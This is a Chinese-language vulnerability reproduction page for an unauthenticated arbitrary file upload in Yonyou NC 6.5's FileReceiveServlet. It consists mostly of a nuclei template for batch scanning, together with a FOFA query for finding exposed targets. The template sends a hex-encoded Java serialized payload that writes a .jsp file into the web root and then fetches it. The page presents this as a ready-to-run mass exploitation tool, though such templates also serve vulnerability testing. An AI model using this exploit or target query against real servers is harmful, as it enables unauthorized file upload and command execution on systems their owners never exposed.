用友NC FileReceiveServlet任意文件上传漏洞

漏洞简介

用友NC6.5的FileReceiveServlet接口，存在任意文件上传漏洞。漏洞成因在于上传文件处未作类型限制，未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞，成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。

漏洞复现

fofa语法：app="用友-UFIDA-NC"
登录页面

POC：

访问上传后的文件

nuclei批量yaml文件

id: yonyou_NC_filereceiveservlet_fileupload

info:
  name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
  author: bjxsec
  severity: critical
  description: |
    An unauthorized attacker can upload a file via the FileReceiveServlet endpoint.
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-arbitrary-file-upload.yaml
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="用友-UFIDA-NC"
  tags: yonyou,file-upload,intrusive
variables:
  file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
  file_content: "{{randstr}}"

http:
  - raw:
      - |
        POST /servlet/FileReceiveServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;

        {{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}{{file_name}}{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}}
      - |
        GET /{{file_name}} HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && status_code_2 == 200"
          - "contains(body_2, '{{file_content}}')"
        condition: and
# digest: 4a0a00473045022100dbda103ee05560f985e28b7ed7246cf8d1e4cf09da32a9d3b1645f86e5e14b740220651e7c2efef0e9014dc27f726ace13bb66b3e82e1f6d200ae08eb3c45cf1a35f:922c64590222798bb761d5b6d8e72950